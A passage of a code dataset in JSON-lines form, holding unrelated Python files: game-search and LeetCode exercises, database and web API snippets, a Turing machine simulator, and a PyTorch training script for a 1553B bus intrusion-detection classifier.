f\"training{j}\")\n plt.plot(history.history['val_accuracy'], label = f\"test{j}\")\n print(\"This is the validation, not overfitted:\", np.max(history.history['val_accuracy']))\n plt.legend()\n\n\n# new_model = keras.models.load_model('Best NN 8')\n# new_model.summary()\n# # Evaluate the restored model\n# loss, acc = new_model.evaluate(X_test, y_test, verbose=2)\n# print('Restored model, accuracy: {:5.2f}%'.format(100 * acc))\n","repo_name":"thomasritmeester/EPO-4_BioBombs","sub_path":"Machine learning/NN test file.py","file_name":"NN test file.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5129199847","text":"import random\nimport math\n\nC = 1.4\n\ndef ucb_score(node, parent_visits, exploration_constant):\n if node.visits == 0:\n return float('inf')\n exploitation_term = node.wins / node.visits\n exploration_term = math.sqrt(math.log(parent_visits) / node.visits)\n return exploitation_term + exploration_constant * exploration_term\n\nclass Node: \n def __init__(self, state, parent=None, position=None):\n self.state = state\n self.parent = parent\n self.children = []\n self.position = position\n self.visits = 0\n self.wins = 0\n\n def select(self):\n ucb_scores = [ucb_score(child, self.visits, C) for child in self.children]\n max_ucb = max(ucb_scores)\n max_indices = [i for i in range(len(ucb_scores)) if ucb_scores[i] == max_ucb]\n return self.children[random.choice(max_indices)]\n\n def expand(self):\n for move in self.state.get_possible_moves():\n copy = self.state.copy()\n copy.make_move(move)\n child = Node(copy, self, move)\n self.children.append(child)\n\n def update(self, result):\n self.visits += 1\n self.wins += result\n if self.parent:\n self.parent.update(result)\n \n\nclass TicTacToe:\n def __init__(self):\n self.board = [['-' for _ in range(3)] for _ in range(3)]\n self.current_player = 'X'\n\n def copy(self):\n copy_game = TicTacToe()\n copy_game.board = [row[:] for row in self.board]\n copy_game.current_player = self.current_player\n return copy_game\n\n def get_possible_moves(self):\n moves = []\n for row in range(3):\n for col in range(3):\n if self.board[row][col] == '-':\n moves.append((row, col))\n return moves\n\n def make_move(self, move):\n row, col = move\n self.board[row][col] = self.current_player\n self.current_player = 'O' if self.current_player == 'X' else 'X'\n\n def is_win(self, player):\n if any(all(self.board[row][col] == player for col in range(3)) for row in range(3)):\n return True\n if any(all(self.board[row][col] == player for row in range(3)) for col in range(3)):\n return True\n if all(self.board[i][i] == player for i in range(3)):\n return True\n if all(self.board[i][2-i] == player for i in range(3)):\n return True\n return False\n\n def is_draw(self):\n for row in range(3):\n for col in range(3):\n if self.board[row][col] == '-':\n return False\n return True\n\n def is_terminal(self):\n return self.is_win('X') or self.is_win('O') or self.is_draw()\n\n def get_winner(self):\n if self.is_win('X'):\n return 'X'\n elif self.is_win('O'):\n return 'O'\n else:\n return None\n\n def print_board(self):\n print(\" 0 1 2\")\n for i in range(3):\n row_str = f\"{i} \"\n for j in range(3):\n row_str += f\"{self.board[i][j]} \"\n print(row_str) \ndef simulate_game(game, debug=False):\n while not game.is_terminal():\n game.make_move(random.choice(game.get_possible_moves()))\n winner = game.get_winner()\n if winner == 'X':\n return -1\n elif winner == 
'O':\n return 1\n return 0\n\ndef print_tree(node, depth=0):\n if node is None:\n return\n indent = ' ' * depth\n print(f\"{indent} {node.position}\")\n print(f\"{indent} v:{node.visits} w:{node.wins}\")\n for child in node.children:\n print_tree(child, depth + 2)\n\ndef monte_carlo_tree_search(game, num_iterations, debug=False):\n \"\"\"\n Performs Monte Carlo Tree Search from the given node for a certain number of iterations.\n\n :param node: The root node of the tree to search.\n :param num_simulations: The number of simulations to run.\n :return: The best move found by the search.\n \"\"\"\n root = Node(game)\n for _ in range(num_iterations):\n node = root\n while node.children:\n # Selection: Choose a child node to explore using UCB scores\n node = node.select()\n if not node.visits:\n # Expansion: Expand the selected node by adding a new child node\n node.expand()\n\n # Simulation: Simulate a game from the new child node\n result = simulate_game(node.state.copy(), debug=debug)\n\n # Backpropagation: Update the tree statistics from the simulation result\n node.update(result)\n \n if debug:\n print_tree(root)\n bestNode = max(root.children, key=lambda node: node.visits)\n return bestNode.position\n\ngame = TicTacToe()\n\n\nprint(\"--------------------\")\nprint(\"TIK TAK TOE\")\nprint(\"--------------------\")\ngame.print_board()\n\nwhile not game.is_terminal():\n if game.current_player == 'X':\n xy = input(\"Enter row and column as x,y: \").split(',')\n if len(xy) == 2 and xy[0].isdigit() and xy[1].isdigit():\n row, col = int(xy[0]), int(xy[1])\n game.make_move((row, col))\n else:\n raise RuntimeError(\"Invalid input\")\n else:\n move = monte_carlo_tree_search(game, 100, False)\n game.make_move(move)\n\n game.print_board()\n print(\"\\n\")\n\nwinner = game.get_winner()\nif winner:\n print(f\"{winner} wins!\")\nelse:\n print(\"It's a draw!\")","repo_name":"stevenandersonz/ai-stuff","sub_path":"mcts/mcts.py","file_name":"mcts.py","file_ext":"py","file_size_in_byte":5397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"36406738978","text":"#\n# @lc app=leetcode.cn id=1805 lang=python3\n#\n# [1805] 字符串中不同整数的数目\n#\n\n# @lc code=start\nclass Solution:\n def numDifferentIntegers(self, word: str) -> int:\n x = \"\"\n res = set()\n for o in word:\n if '0' <= o <= '9':\n x += o\n else:\n if x:\n res.add(int(x))\n x = \"\"\n if x:\n res.add(int(x))\n return len(res)\n# @lc code=end\n\n","repo_name":"yarzzz/leetcode_python3","sub_path":"1805.字符串中不同整数的数目.py","file_name":"1805.字符串中不同整数的数目.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37676340969","text":"from influxdb import InfluxDBClient\nclient = InfluxDBClient(host='localhost', port=8086)\nclient.create_database('pyexample')\nclient.get_list_database()\nclient.switch_database('pyexample')\n\njson_body = [\n {\n \"measurement\": \"brushEvents\",\n \"tags\": {\n \"user\": \"Carol\",\n \"brushId\": \"6c89f539-71c6-490d-a28d-6c5d84c0ee2f\"\n },\n \"time\": \"2018-03-28T8:01:00Z\",\n \"fields\": {\n \"duration\": 127\n }\n },\n {\n \"measurement\": \"brushEvents\",\n \"tags\": {\n \"user\": \"Carol\",\n \"brushId\": \"6c89f539-71c6-490d-a28d-6c5d84c0ee2f\"\n },\n \"time\": \"2018-03-29T8:04:00Z\",\n \"fields\": {\n \"duration\": 132\n }\n },\n {\n \"measurement\": \"brushEvents\",\n \"tags\": {\n \"user\": \"Carol\",\n \"brushId\": \"6c89f539-71c6-490d-a28d-6c5d84c0ee2f\"\n },\n 
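# --- Editor's aside (hedged sketch for the LeetCode 1805 record above) ---
# numDifferentIntegers scans character by character; a regex does the same in
# one pass, and int() normalizes leading zeros exactly as the manual loop does.
import re

def num_different_integers(word: str) -> int:
    return len({int(m) for m in re.findall(r'\d+', word)})

# num_different_integers("a123bc34d8ef34") == 3   # the set is {123, 34, 8}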
\"time\": \"2018-03-30T8:02:00Z\",\n \"fields\": {\n \"duration\": 129\n }\n }\n]\n\n\nclient.write_points(json_body)\n\nclient.query('SELECT \"duration\" FROM \"pyexample\".\"autogen\".\"brushEvents\" WHERE time > now() - 4d GROUP BY \"user\"')","repo_name":"Microshak/MicroNotes","sub_path":"Databases/Influx/influx.py","file_name":"influx.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"73350607273","text":"import time\n\ndef fib(n):\n starting_time = time.time() \n fi = [0] * (n+1) \n fi[1] = 1\n for i in range (2,n+1): \n fi[i] = fi[i-1] + fi[i-2] \n end_time = time.time() \n executiontime = end_time - starting_time\n return fi[n], executiontime\n\nn = int(input(\"Input an integer from 15 to 35: \"))\nfibvalue,_ = fib(n)\n_,executiontime = fib(n)\nprint(f\"fib({n})=\",fibvalue, end='\\n')\nprint(f\"fib({n}) took\",executiontime, \"seconds\")\n\n","repo_name":"ITSC-3155-Spring23-MMejias/intermediate-python-exercises-2-mitchelln02","sub_path":"exercise_02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17897483820","text":"import os\nimport time\n\nimport pytest\nfrom gi.repository import Gtk\n\n\n@pytest.fixture\ndef session(mocker):\n from tomate.session import Session\n\n return mocker.Mock(Session)\n\n\n@pytest.fixture\ndef graph():\n from tomate.graph import graph\n\n graph.providers.clear()\n\n return graph\n\n\n@pytest.fixture\ndef config(mocker):\n from tomate.config import Config\n\n parent_directory = os.path.dirname(os.path.dirname(__file__))\n icon_path = os.path.join(\n parent_directory, \"data/icons/hicolor/16x16/apps/tomate-plugin.png\"\n )\n instance = mocker.Mock(\n Config,\n SECTION_SHORTCUTS=Config.SECTION_SHORTCUTS,\n SECTION_TIMER=Config.SECTION_TIMER,\n **{\"get_int.return_value\": 25, \"get_icon_path.return_value\": icon_path}\n )\n\n return instance\n\n\n@pytest.fixture\ndef plugin_manager(mocker):\n return mocker.Mock()\n\n\n@pytest.fixture\ndef lazy_proxy(mocker):\n from tomate.proxy import lazy_proxy\n\n return mocker.Mock(lazy_proxy)\n\n\ndef refresh_gui(delay=0):\n while Gtk.events_pending():\n Gtk.main_iteration_do(False)\n time.sleep(delay)\n","repo_name":"proganalysis/python3_types","sub_path":"Result/4079files/source/1370.py","file_name":"1370.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"42243925997","text":"from datetime import datetime\nimport time\n\n\nclass TuringMachine:\n\n def checkInstruction(self, currentState, currentChar):\n for it in self.data.instructions[currentState]:\n if it.currentChar == currentChar:\n return it\n\n def printPointer(self, number, state, instruction):\n result = \"\"\n for i in range(number):\n result += \" \"\n result += \"|\"\n tmp = \"Stan: \" + str(state)\n result += tmp.center(10)\n result += str(instruction)\n self.lines.append(result)\n print(result)\n\n def currentWord(self, word):\n tmp = []\n for it in word:\n tmp.append(it)\n return \"\".join(tmp)\n\n def changeChar(self, word, index, newChar):\n tmp = []\n for i in range(len(word)):\n if i == index:\n tmp.append(newChar)\n else:\n tmp.append(word[i])\n return \"\".join(tmp)\n\n def printWord(self, word):\n print(\"___\" + word + \"___\")\n self.lines.append(\"___\" + word + \"___\" + \"\\n\")\n\n def 
saveToFile(self):\n file = open(\"resultOfSimulationMT.txt\", \"a\")\n now = datetime.now()\n file.write(\"-------------------------------------------------\".center(50))\n file.write(\"\\nData uruchomienia symulatora: \" + now.strftime(\"%d/%m/%Y %H:%M:%S\" + \"\\n\\n\"))\n file.write(\"Słowo początkowe: \" + self.data.word + \"\\n\")\n for it in self.lines:\n file.write(it + \"\\n\")\n file.write(\"-------------------------------------------------\".center(50))\n file.close()\n print(\"Wynik działania symulatora został zapisany do pliku resultOfSimulationMT.txt\")\n\n def run(self, data):\n start = time.time()\n self.lines = []\n self.data = data\n self.lines.append(self.data.description + \"\\n\")\n print(self.data.description)\n word = self.currentWord(self.data.word)\n\n currentState = int(self.data.initialState)\n i = 0\n while True:\n if self.data.word[i] == '_':\n i += 1\n else:\n break\n counter = 0\n while True:\n counter += 1\n if counter > (len(self.data.word) * 1000):\n print(\"Maszyna prawdopodobnie została zapętlona w instrukcji '\" + str(instruction) + \"' i niespodziewanie zakończyła swoją pracę.\")\n self.lines.append(\"Maszyna prawdopodobnie została zapętlona i niespodziewanie zakończyła swoją pracę.\")\n return\n\n if i >= len(word) or i < 0:\n instruction = self.checkInstruction(currentState, '_')\n else:\n if word[i] not in self.data.alphabet:\n print(\"Maszyna napotkała znak spoza podanego alfabetu i nieoczekiwanie zakończyła swoją pracę.\")\n self.lines.append(\"Maszyna napotkała znak spoza podanego alfabetu i nieoczekiwanie zakończyła swoją pracę.\")\n return\n instruction = self.checkInstruction(currentState, word[i])\n self.printPointer(i + 3, currentState, instruction)\n\n self.printWord(word)\n\n word = self.changeChar(word, i, instruction.newChar)\n if instruction.move == 'l':\n currentState = int(instruction.nextState)\n i -= 1\n elif instruction.move == \"s\":\n self.printPointer(i + 3, instruction.nextState, instruction)\n self.printWord(word)\n print(\"Symulator kończy pracę w stanie: \" + instruction.nextState)\n self.lines.append(\"Symulator kończy pracę w stanie: \" + instruction.nextState)\n break\n elif instruction.move == \"r\":\n i += 1\n currentState = int(instruction.nextState)\n\n diff = time.time() - start\n tmp = \"_\"\n for it in word:\n if it != \"_\":\n tmp += it\n tmp += \"_\"\n print(\"Koniec działania symulatora.\")\n print(\"Słowo po zakończeniu pracy symulatora: \" + tmp)\n print(\"\\nPodsumowanie:\")\n print(\"\\tLiczba kroków wykonanych przez symulator: \" + str(counter))\n print(\"\\tCzas wykonania programu: \" + \"{:.4f}\".format(diff))\n\n self.lines.append(\"Słowo po zakończeniu pracy symulatora: \" + tmp)\n self.lines.append(\"Koniec działania symulatora.\")\n self.lines.append(\"\\nPodsumowanie:\")\n self.lines.append(\"\\tLiczba kroków wykonanych przez symulator: \" + str(counter))\n self.lines.append(\"\\tCzas wykonania programu: \" + \"{:.4f}\".format(diff))\n self.saveToFile()\n","repo_name":"MateuszKopczan/TuringMachineSimulator","sub_path":"TuringMachine.py","file_name":"TuringMachine.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37821630647","text":"import argparse\nimport getpass\nimport random\nimport time\nimport warnings\nfrom argparse import ArgumentParser\nfrom typing import Type\n\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning.loggers import 
(\n LightningLoggerBase,\n MLFlowLogger,\n TensorBoardLogger,\n)\n\nfrom deep_memory_update.data import BaseDataModule\nfrom deep_memory_update.models import BaseModel\nfrom deep_memory_update.models.utils import ThresholdedEarlyStopping\n\nwarnings.filterwarnings(\n \"ignore\",\n message=\"Your `IterableDataset` has `__len__` defined\",\n category=UserWarning,\n)\nwarnings.filterwarnings(\n \"ignore\",\n message=r\"The dataloader, (.*?) does not have many workers\",\n category=UserWarning,\n)\n\n\nclass Experiment:\n def __init__(\n self,\n model: Type[BaseModel],\n data_module: Type[BaseDataModule],\n parser_default: dict = None,\n ):\n self.model = model\n self.data_module = data_module\n self.early_stopping = ThresholdedEarlyStopping\n self.parser_default = parser_default if parser_default is not None else {}\n\n def run(self):\n parser = self.create_parser()\n args = parser.parse_args()\n\n if args.seed is not None:\n pl.seed_everything(args.seed)\n\n if args.fast_dev_run:\n args.batch_size_val = args.batch_size\n args.batch_size_test = args.batch_size\n\n if args.distributed_backend == \"ddp\":\n # When using a single GPU per process and per\n # DistributedDataParallel, we need to divide the batch size\n # ourselves based on the total number of GPUs we have\n args.batch_size = int(args.batch_size / max(1, args.gpus))\n args.workers = int(args.workers / max(1, args.gpus))\n\n data_module = self.data_module(**vars(args))\n model = self.model(\n **vars(args),\n input_size=data_module.input_size(),\n output_size=data_module.output_size(),\n loss_weight=data_module.loss_weight(),\n pad_sequence=data_module.pad_sequence,\n )\n early_stopping = self.early_stopping(**vars(args))\n\n logger = self.create_logger(logger_name=args.logger_name)\n trainer = pl.Trainer.from_argparse_args(args, logger=logger)\n if args.checkpoint_monitor:\n checkpoint_callback = ModelCheckpoint(\n monitor=args.checkpoint_monitor,\n save_top_k=args.checkpoint_top_k,\n mode=args.checkpoint_mode,\n )\n trainer.callbacks.append(checkpoint_callback)\n\n if args.thresholded_early_stopping:\n trainer.callbacks.append(early_stopping)\n trainer.logger.log_hyperparams(args)\n\n start = time.time()\n trainer.fit(model, datamodule=data_module)\n end = time.time()\n\n if not args.no_evaluate:\n if args.checkpoint_monitor:\n trainer.test(ckpt_path=checkpoint_callback.best_model_path)\n else:\n trainer.test(ckpt_path=\"best\")\n\n print(\"Elapsed time:\", \"%.2f\" % (end - start))\n\n def create_logger(self, logger_name: str = \"tb\") -> LightningLoggerBase:\n if logger_name == \"tb\":\n return TensorBoardLogger(\n save_dir=\"tb_logs\",\n name=self.data_module.data_name,\n )\n elif logger_name == \"mlf\":\n return MLFlowLogger(\n experiment_name=self.data_module.data_name,\n tags={\n \"mlflow.runName\": self.model.model_name,\n \"mlflow.user\": getpass.getuser(),\n },\n )\n else:\n raise RuntimeError(f\"Wrong logger name: {logger_name}\")\n\n def create_parser(self):\n parser = ArgumentParser(add_help=True)\n parser = self.add_trainer_parser(parser)\n parser = self.add_experiment_parser(parser)\n parser = self.data_module.add_model_specific_args(parser)\n parser = self.model.add_model_specific_args(parser)\n parser = self.early_stopping.add_callback_specific_args(parser)\n parser.set_defaults(\n progress_bar_refresh_rate=2,\n **self.parser_default,\n )\n parser.formatter_class = argparse.ArgumentDefaultsHelpFormatter\n return parser\n\n def add_trainer_parser(self, parser: ArgumentParser):\n parser = 
pl.Trainer.add_argparse_args(parser)\n parser.set_defaults(\n deterministic=True,\n max_epochs=100,\n )\n return parser\n\n def add_experiment_parser(self, parser: ArgumentParser):\n parser.add_argument(\n \"--no-evaluate\",\n dest=\"no_evaluate\",\n action=\"store_true\",\n help=\"do not evaluate model on validation set\",\n )\n parser.add_argument(\n \"--seed\",\n dest=\"seed\",\n type=int,\n default=random.randrange(1 << 32 - 1),\n help=\"seed for model training.\",\n )\n parser.add_argument(\n \"--logger-name\",\n dest=\"logger_name\",\n type=str,\n choices=[\"tb\", \"mlf\"],\n default=\"tb\",\n help=\"Logger name.\",\n )\n parser.add_argument(\n \"--checkpoint-monitor\",\n dest=\"checkpoint_monitor\",\n type=str,\n default=\"\",\n help=\"Metric used for checkpointing\",\n )\n parser.add_argument(\n \"--checkpoint-top-k\",\n dest=\"checkpoint_top_k\",\n type=int,\n default=1,\n help=\"Save top k models\",\n )\n parser.add_argument(\n \"--checkpoint-mode\",\n dest=\"checkpoint_mode\",\n type=str,\n choices=[\"min\", \"max\"],\n default=\"min\",\n help=\"Mode for the checkpoint monitoring\",\n )\n return parser\n","repo_name":"fuine/dmu","sub_path":"deep_memory_update/experiments/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19947691529","text":"from flask_restful import Resource\nfrom bson import ObjectId\nfrom flask import request\nfrom dao.session import get_session\nfrom dao.user import get_user_by_id, get_user_by_mail\nfrom dao.game_instance import create_game_instance, get_pending_request, accepted_game_instance, get_game_invitations_to_user, get_inactive_game_instances,get_completed_game_instances\nfrom views.game_instance import single as single_game_instance ,multiple as multiple_game_instance\n\ndef add_buttonValue_to_game_instance(gi,user):\n for obj in gi:\n opposition_user = obj[\"user1\"]\n if ObjectId(obj[\"user2\"]) != user[\"_id\"]:\n opposition_user = obj[\"user2\"]\n user_alias = get_user_by_id(opposition_user)\n obj[\"buttonValue\"] = user_alias[\"alias\"]\n return gi\n\nclass GameInstance(Resource):\n\n def get(self):\n params = request.args.to_dict()\n\n session = get_session(params['token'])\n user_id = session['user']\n\n if user_id:\n user = get_user_by_id(user_id)\n if not user:\n return {\"response\" : \"User not found\"}, 404\n\n gi_pending = get_game_invitations_to_user(user_id)\n gi_pending = multiple_game_instance(gi_pending)\n\n gi_inaction = get_inactive_game_instances(user_id)\n gi_inaction = multiple_game_instance(gi_inaction)\n\n gi_completed = get_completed_game_instances(user_id)\n gi_completed = multiple_game_instance(gi_completed)\n return {\"response\" : {\"pending\" : add_buttonValue_to_game_instance(gi_pending,user),\n \"inaction\" : add_buttonValue_to_game_instance(gi_inaction,user),\n \"completed\" : add_buttonValue_to_game_instance(gi_completed, user)}}\n\n def post(self):\n params = request.args.to_dict()\n\n session = get_session(params['token'])\n user_id = session['user']\n\n if user_id:\n requesting_user = get_user_by_id(user_id)\n if not requesting_user:\n return {\"response\" : \"User not found\"}, 404\n\n payload = request.json\n\n try:\n email = payload['email']\n except:\n return {\"response\" : \"Bad request\"} , 400\n\n requested_user = get_user_by_mail(email)\n if not requested_user:\n return {\"response\" : \"Requested User not found\"}, 404\n\n user1, user2 = 
requesting_user[\"_id\"], requested_user[\"_id\"]\n\n if get_pending_request(user1 ,user2):\n return {\"response\" : \"Already requested for game instance\"}\n\n gi = create_game_instance(user1, user2)\n return {\"response\" : str(gi)}\n\n def put(self):\n params = request.args.to_dict()\n\n session = get_session(params['token'])\n user_id = session['user']\n\n if user_id:\n requested_user = get_user_by_id(user_id)\n if not requested_user:\n return {\"response\" : \"User not found\"}, 404\n\n payload = request.json\n\n try:\n userid = payload[\"userid\"]\n except:\n return {\"response\" : \"Bad request\"} , 400\n\n requesting_user = get_user_by_id(userid)\n if not requesting_user:\n return {\"response\" : \"Requested User not found\"}, 404\n\n user1, user2 = requesting_user[\"_id\"], requested_user[\"_id\"]\n gi = get_pending_request(user1, user2)\n\n accepted_game_instance(gi[\"_id\"])\n\n return {\"response\" : single_game_instance(gi)}\n","repo_name":"sumitkukade/TicTacToe","sub_path":"gameservice/business_logic/serviceapis/gameinstance.py","file_name":"gameinstance.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28482292094","text":"# https://leetcode.com/problems/parallel-courses-iii/\n\nclass Solution:\n def minimumTime(self, n: int, relations: List[List[int]], time: List[int]) -> int:\n @lru_cache(None)\n def getTime(course):\n if not graph[course]:\n return time[course - 1]\n\n max_time = float(-inf)\n for crs in graph[course]:\n max_time = max(getTime(crs), max_time)\n\n return time[course - 1] + max_time\n\n graph = defaultdict(list)\n\n for i, (pre, course) in enumerate(relations):\n graph[course].append(pre)\n\n graph[n + 1] = [i + 1 for i in range(n)]\n time.append(0)\n\n return getTime(n + 1)\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_17/parallel-courses-iii.py","file_name":"parallel-courses-iii.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73248859434","text":"s = input().split()[0]\n\ncycles = []\nfor i in range(len(s)):\n s = s[1::] + s[0]\n cycles.append(s)\ncycles.sort()\n\nres = ''\nfor i in cycles:\n res += i[-1]\n\nprint(res)","repo_name":"priamoryki/ITMO","sub_path":"semester-1/discrete-math/Lab-3/TaskB.py","file_name":"TaskB.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1228624345","text":"import json\r\nimport math\r\nimport shutil\r\nimport sys\r\nimport time\r\nimport traceback\r\nfrom json import JSONEncoder, JSONDecoder\r\nfrom time import sleep\r\nfrom typing import Any, Callable, List, Union\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom torch import nn\r\nimport os\r\nimport multiprocessing as mp\r\n\r\nimport torch\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom ids.generate_default_config import PARAM_CONFIG_FILE_NAME\r\nfrom ids.traffic_classifier import BusClassifier\r\nfrom ids.dataprocess import Dataset, set_log_output\r\nfrom ids.models.gru_1553B_bus_classifier import BusClassifierGruNet\r\nfrom ids.models.lstm_1553B_bus_classifier import BusClassifierLSTMNet\r\nfrom ids.utils import create_tensor, time_since, read_param_config, get_parameters, LogFilePath\r\n\r\n\r\ndef load_parameter_from_file(file_name):\r\n file_name = os.path.abspath(file_name)\r\n if not file_name:\r\n return\r\n elif 
not os.path.exists(file_name):\r\n print(\"Config file not exists.\")\r\n else:\r\n return read_param_config(file_name)\r\n\r\n\r\ndef auto_train(model_parameter: dict, output=sys.stdout):\r\n is_trained = False\r\n model_common_prefix = str(model_parameter['Index'])\r\n modal_file_name = model_common_prefix + '.pth'\r\n model_path = os.path.join(model_parameter['TrainedModelPath'], modal_file_name)\r\n if os.path.exists(model_path):\r\n print(\"Model already trained. Only test.\", file=output, flush=True)\r\n is_trained = True\r\n train_log_path = os.path.join(model_parameter['TrainLogPath'], model_common_prefix + '.txt')\r\n train_result_path = os.path.join(model_parameter['TrainResultPath'], model_common_prefix + '.result')\r\n test_log_path = os.path.join(model_parameter['TestLogPath'], model_common_prefix + '.txt')\r\n test_result_path = os.path.join(model_parameter['TestResultPath'], model_common_prefix + '.result')\r\n if is_trained:\r\n f_train_log = sys.stdout\r\n f_train_result = sys.stdout\r\n else:\r\n f_train_log = open(train_log_path, 'w')\r\n f_train_result = open(train_result_path, 'w')\r\n f_test_log = open(test_log_path, 'w')\r\n f_test_result = open(test_result_path, 'w')\r\n try:\r\n # 数据读取\r\n # Use Class Dataset to preprocess raw data\r\n print(\"Reading Dataset......\", file=output, end='', flush=True)\r\n dataset = Dataset(model_parameter['TrainDatasetPath'], look_back=model_parameter['SeqLen'])\r\n # dataset = Dataset(model_parameter['TrainDatasetPath'], look_back=model_parameter['SeqLen'], is_binary=True)\r\n class_labels = dataset.get_label_classes()\r\n train_set, test_set = dataset.get_train_test_data(proportion=0.8, generator=527)\r\n print(\"Success\", file=output, flush=True)\r\n\r\n # Create DataLoader For Pytorch\r\n print(\"Generating DataLoader......\", file=output, end='', flush=True)\r\n train_loader = DataLoader(train_set, batch_size=model_parameter['BatchSize'], num_workers=0, drop_last=True)\r\n test_loader = DataLoader(test_set, batch_size=model_parameter['BatchSize'], shuffle=True, num_workers=0,\r\n pin_memory=False)\r\n print(\"Success\", file=output, flush=True)\r\n\r\n N_MESS = dataset.get_feature_num()\r\n N_TYPE = dataset.get_label_num()\r\n if N_TYPE == 2:\r\n N_TYPE = 1\r\n # Create Bus Classifier\r\n print(\"Defining Model......\", file=output, end='', flush=True)\r\n model_type = model_parameter['TypeName']\r\n if \"GRU\" in model_type:\r\n classifier = BusClassifierGruNet(input_size=N_MESS, hidden_size=model_parameter['HiddenSize'],\r\n output_size=N_TYPE, batch_first=True, num_layers=model_parameter['Layer'],\r\n bidirectional=model_parameter['Bidirectional'],\r\n dropout=model_parameter['DropRate']) # 定义模型\r\n elif model_type == \"LSTM\":\r\n classifier = BusClassifierLSTMNet(input_size=N_MESS, hidden_size=model_parameter['HiddenSize'],\r\n output_size=N_TYPE, batch_first=True, num_layers=model_parameter['Layer'],\r\n bidirectional=model_parameter['Bidirectional'],\r\n dropout=model_parameter['DropRate']) # 定义模型\r\n else:\r\n print(\"Unsupported Model Type.\", file=output, flush=True)\r\n return\r\n model_active_func = model_parameter['ActiveFunction']\r\n if model_active_func == 'ReLU':\r\n classifier.af = nn.ReLU()\r\n elif model_active_func == 'Tanh':\r\n classifier.af = nn.Tanh()\r\n elif model_active_func == 'Sigmoid':\r\n classifier.af = nn.Sigmoid()\r\n print(\"Success\", file=output, flush=True)\r\n\r\n classifier = create_tensor(classifier)\r\n # 定义损失函数criterion,使用交叉熵损失函数\r\n print(\"Defining Loss Function......\", 
file=output, end='', flush=True)\r\n if N_TYPE > 2:\r\n criterion = torch.nn.CrossEntropyLoss()\r\n else:\r\n criterion = torch.nn.BCEWithLogitsLoss()\r\n print(\"Success\", file=output, flush=True)\r\n # 梯度下降使用的Adam算法\r\n print(\"Defining optimizer......\", file=output, end='', flush=True)\r\n opt_choice = model_parameter['Optimizer']\r\n lr = model_parameter['LearningRate']\r\n if opt_choice == 'Adam':\r\n optimizer = torch.optim.Adam(classifier.parameters(), lr=lr)\r\n elif opt_choice == 'NAdam':\r\n optimizer = torch.optim.NAdam(classifier.parameters(), lr=lr)\r\n elif opt_choice == 'RMSprop':\r\n optimizer = torch.optim.RMSprop(classifier.parameters(), lr=lr)\r\n elif opt_choice == 'Adagrad':\r\n optimizer = torch.optim.Adagrad(classifier.parameters(), lr=lr)\r\n elif opt_choice == 'Adadelta':\r\n optimizer = torch.optim.Adadelta(classifier.parameters(), lr=lr)\r\n elif opt_choice == 'Adamax':\r\n optimizer = torch.optim.Adamax(classifier.parameters(), lr=lr)\r\n else:\r\n print(f'Wrong optimizer:{opt_choice}', file=output, flush=True)\r\n return\r\n print(\"Success\", file=output, flush=True)\r\n bc = BusClassifier(classifier, num_epoch=model_parameter['EpochNum'], criterion=criterion, optimizer=optimizer,\r\n model_path=model_path, train_log_output=f_train_log, train_result_output=f_train_result,\r\n test_log_output=f_test_log, test_result_output=f_test_result)\r\n bc.set_class_labels(class_labels)\r\n bc.set_test_path(model_parameter['TestLogPath'])\r\n bc.set_model_name(model_common_prefix)\r\n\r\n train_result = None\r\n if not is_trained:\r\n print(\"Start training......\", file=output, flush=True)\r\n train_result = bc.trainModel(train_loader)\r\n print(\"Success\", file=output, flush=True)\r\n print(\"Start evaluating......\", file=output, flush=True)\r\n test_result = bc.eval_model(test_loader)\r\n print(\"Success\", file=output, flush=True)\r\n except Exception as e:\r\n print(e)\r\n traceback.print_exc()\r\n return\r\n finally:\r\n if not is_trained:\r\n f_train_log.close()\r\n f_train_result.close()\r\n f_test_log.close()\r\n f_test_result.close()\r\n return train_result, test_result\r\n\r\n\r\nSAVE_FILE_NAME = 'Result.xlsx'\r\n\r\n\r\ndef save_results_to_file(results, is_binary=False):\r\n \"\"\"\r\n :param results: param,train result,test result\r\n :return:\r\n \"\"\"\r\n sz = len(results)\r\n\r\n r = []\r\n for param, train_result, test_result in results:\r\n res = test_result.copy()\r\n for k, v in param.items():\r\n if 'Train' in k: continue\r\n if 'Test' in k: continue\r\n if 'Log' in k: continue\r\n if 'Path' in k: continue\r\n if 'Result' in k: continue\r\n res[k] = v\r\n tc = res['TimeCost'].strip().split(' ')\r\n mnt = int(tc[0][:-1])\r\n sec = float(tc[1][:-1])\r\n tc = mnt * 60 + sec\r\n res['TimeCost'] = tc\r\n r.append(res)\r\n\r\n output = pd.DataFrame(r)\r\n output.to_excel(SAVE_FILE_NAME, index=False)\r\n\r\n\r\nif __name__ == '__main__':\r\n config_file_name = os.path.basename(PARAM_CONFIG_FILE_NAME)\r\n config = 